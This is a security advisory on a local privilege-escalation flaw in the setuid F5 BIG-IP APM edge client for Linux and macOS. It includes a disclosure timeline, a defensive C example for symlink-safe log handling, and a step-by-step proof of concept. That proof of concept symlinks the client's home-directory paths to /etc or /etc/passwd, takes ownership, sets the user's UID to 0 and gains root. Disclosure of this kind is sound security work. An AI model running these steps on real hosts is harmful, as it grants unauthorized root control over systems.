Title: F5 BIG-IP APM client for Linux and macOS vulnerability
Author: Rich Mirch
CVE: CVE-2018-5529 (incomplete fix), CVE-2018-5546
Vendor Advisory: https://support.f5.com/csp/article/K52171282 (CVE-2018-5529)
https://support.f5.com/csp/article/K54431371 (CVE-2018-5546)
Description
The svpn_x86_64 binary included in the F5 Linux CLI Edge Client package
changes the ownership and permissions of several files and directories
under $HOME/.F5Networks, which allows local unprivileged users to obtain
ownership of arbitrary files via vectors involving creation of a directory
and a file under that directory, and later replacing that directory or
file with a symlink.
Notes:
1. The PoC is provided for Linux; however, macOS is also vulnerable. The svpn
binary is named differently and stored in a different directory on macOS.
2. The policyserver component is also vulnerable to a similar attack against
the $HOME/Library/Logs/F5Networks/policyserver.log file on macOS.
CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C
Base: 7.8
Temporal: 7.0
Test Environment
OS: CentOS 64-bit release 6.9 (latest patches as of 2018-04-12)
Kernel: 2.6.32-696.23.1.el6.x86_64
ISO: apmclients-7160.2018.118.2335-4172.0.iso
Proof Of Concept
Two distinct arbitrary file takeover vulnerabilities exist in the
/usr/local/lib/F5Networks/SSLVPN/svpn_x86_64 binary which is setuid root.
1. Privileges are not dropped prior to chown()/chmod() of the
$HOME/.F5Networks directory.
2. Privileges are not dropped prior to chown()/chmod() of the
$HOME/.F5Networks/svpn.log file.
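Both root causes are the same setuid mistake: the binary touches a path under the user's $HOME while still running with euid 0, and follows symlinks on the way. The block below is an added example written for this advisory, not F5's code: a hypothetical helper, open_user_log(), that a setuid program could use instead of chown()/chmod() to set up its per-user log, dropping to the real uid first, refusing symlinks at both the directory and the file, and verifying ownership with fstat() rather than forcing it.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open (creating if needed) the per-user log <dir>/<name> for append without
 * letting a symlink planted by the user redirect the operation to a root-owned
 * file.  Returns an open fd, or -1.  Hypothetical helper written for this
 * advisory, not F5's code. */
int open_user_log(const char *dir, const char *name)
{
    uid_t real_uid = getuid(), saved_euid = geteuid();
    struct stat st;
    int dirfd, fd = -1;

    /* 1. Drop to the real user before touching anything under $HOME: a
     *    chown()/chmod()/open() on a symlink target the user cannot write
     *    then fails with EPERM/EACCES instead of succeeding as root. */
    if (seteuid(real_uid) != 0)
        return -1;

    /* 2. Refuse a symlinked directory ($HOME/.F5Networks -> /etc): ELOOP. */
    dirfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (dirfd >= 0) {
        /* 3. Create/open the log relative to dirfd; O_NOFOLLOW rejects a
         *    planted symlink (svpn.log -> /etc/passwd) the same way. */
        fd = openat(dirfd, name, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
        close(dirfd);
    }

    /* 4. Verify what was actually opened instead of chown()ing it into shape:
     *    it must be a regular file the real user already owns. */
    if (fd >= 0 && (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != real_uid)) {
        close(fd);
        fd = -1;
    }

    /* 5. Regain the saved euid only after the user-controlled path is done. */
    if (seteuid(saved_euid) != 0 && fd >= 0) {
        close(fd);
        fd = -1;
    }
    return fd;
}
```

Against the two layouts used in the test cases below, the helper returns -1 for both the .F5Networks -> /etc symlink and the svpn.log -> /etc/passwd symlink, and because the euid was dropped first, even a stray chown() on the target would have failed with EPERM.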
Note: A low privileged account named user1 is used for all test cases.
[user1@localhost ~]$ id
uid=500(user1) gid=500(user1) groups=500(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
################################################################################
# Test case 1 - take ownership of a directory
# /etc via $HOME/.F5Networks
################################################################################
[Step 1] Create a symlink from /etc to $HOME/.F5Networks
[user1@localhost ~]$ ln -s /etc /home/user1/.F5Networks
[user1@localhost ~]$ ls -ld /etc /home/user1/.F5Networks
drwxr-xr-x. 64 root root 4096 Apr 12 19:29 /etc
lrwxrwxrwx. 1 user1 user1 4 Apr 12 19:38 /home/user1/.F5Networks -> /etc
[Step 2] Execute /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
[user1@localhost ~]$ /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
[Step 3] Show that user1 is now the owner of /etc.
[user1@localhost ~]$ ls -ld /etc
drwxr-xr-x. 64 user1 user1 4096 Apr 12 19:39 /etc
[Step 4] Modify /etc/passwd and change UID/GID to 0 for user1.
[user1@localhost ~]$ cd /etc
[user1@localhost etc]$ mv passwd passwd.old
[user1@localhost etc]$ cp passwd.old passwd
[user1@localhost etc]$ ls -ld /etc/passwd
-rw-r--r--. 1 user1 user1 929 Apr 12 19:40 /etc/passwd
[user1@localhost etc]$ sed -i.orig -e 's/:500:500/:0:0/' /etc/passwd
[user1@localhost etc]$ diff -u /etc/passwd.orig /etc/passwd
--- /etc/passwd.orig 2018-04-12 19:40:02.132987696 -0500
+++ /etc/passwd 2018-04-12 19:41:15.484988778 -0500
@@ -18,4 +18,4 @@
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
-user1:x:500:500::/home/user1:/bin/bash
+user1:x:0:0::/home/user1:/bin/bash
[Step 5] Execute /bin/su - user1 and become root.
[user1@localhost etc]$ /bin/su - user1
Password:
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
################################################################################
# Test case 2 - take ownership of a file
# /etc/passwd via $HOME/.F5Networks/svpn.log
################################################################################
[Step 1] Create $HOME/.F5Networks.
[user1@localhost ~]$ mkdir -m 755 /home/user1/.F5Networks
[Step 2] Display permissions of /etc/passwd and attempt to write to it.
[user1@localhost ~]$ ls -ld /etc /etc/passwd
drwxr-xr-x. 64 root root 4096 Apr 12 19:41 /etc
-rw-r--r--. 1 root root 929 Apr 12 19:40 /etc/passwd
[user1@localhost ~]$ echo test> /etc/passwd
-bash: /etc/passwd: Permission denied
[user1@localhost ~]$
[Step 3] Create a symlink from /etc/passwd to /home/user1/.F5Networks/svpn.log.
[user1@localhost ~]$ ln -s /etc/passwd /home/user1/.F5Networks/svpn.log
[user1@localhost ~]$ ls -ld .F5Networks/svpn.log /etc/passwd
-rw-r--r--. 1 root root 929 Apr 12 19:40 /etc/passwd
lrwxrwxrwx. 1 user1 user1 11 Apr 12 22:02 .F5Networks/svpn.log -> /etc/passwd
[Step 4] Backup /etc/passwd.
[user1@localhost ~]$ cp -p /etc/passwd passwd.orig
[Step 5] Display contents of /etc/passwd.
[user1@localhost ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
user1:x:500:500::/home/user1:/bin/bash
[Step 6] Execute /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64. user1 is
now the owner of /etc/passwd.
[user1@localhost ~]$ /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
[user1@localhost ~]$ ls -ld /etc/passwd
-rw-r--r--. 1 user1 user1 2385 Apr 12 22:14 /etc/passwd
[Step 7] Display contents of /etc/passwd. Notice that the log output has been appended to the file.
[user1@localhost ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
user1:x:500:500::/home/user1:/bin/bash
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,,
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, =====================================
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Location: /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Version: "7160.2018.0118.1"
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Locale: C
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, =====================================
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,,
2018-04-12,22:14:15:121, 2479,2479,svpn, 48,,,, current log level = 63
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 91, ------------------,
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 92, [main], getuid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 93, [main], getgid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 94, [main], geteuid, 0
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 95, [main], getegid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 96, [main], HOME, /home/user1
2018-04-12,22:14:15:121, 2479,2479,svpn, 48, , 98, [main], version, 7160.2018.0118.1
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 100, ------------------,
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 107, [main], Current sigprocmask: 0xffff8a00
2018-04-12,22:14:17:124, 2479,2479,svpn, 1, , 33, ReadProperties(), reading of initial configuration timed out
2018-04-12,22:14:17:124, 2479,2479,svpn, 1, , 116, [main], Reading settings property failed
[Step 8] Create a new /etc/passwd file and change UID and GID to 0.
[user1@localhost ~]$ sed -e 's/:500:500/:0:0/' < passwd.orig > /etc/passwd
[Step 9] Execute /bin/su - user1 and become root.
[user1@localhost ~]$ su - user1
Password:
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@localhost ~]#
Timeline:
2018-04-16: Reported to vendor
2018-04-18: Vendor confirmed PoC. Sent to F5 PD for further review
2018-04-25: Vendor confirmed vulnerability and requested embargo
2018-07-12: Vendor released fix in 7.1.7 and advisory K52171282. CVE-2018-5529
2018-07-17: Notified vendor that the fix in 7.1.7 did not properly resolve the issue
2018-07-17: Vendor acknowledged receipt of the incomplete fix report
2018-07-17: Vendor confirmed vulnerability
2018-08-16: Vendor released fix in 7.1.7.1 and advisory K54431371. CVE-2018-5546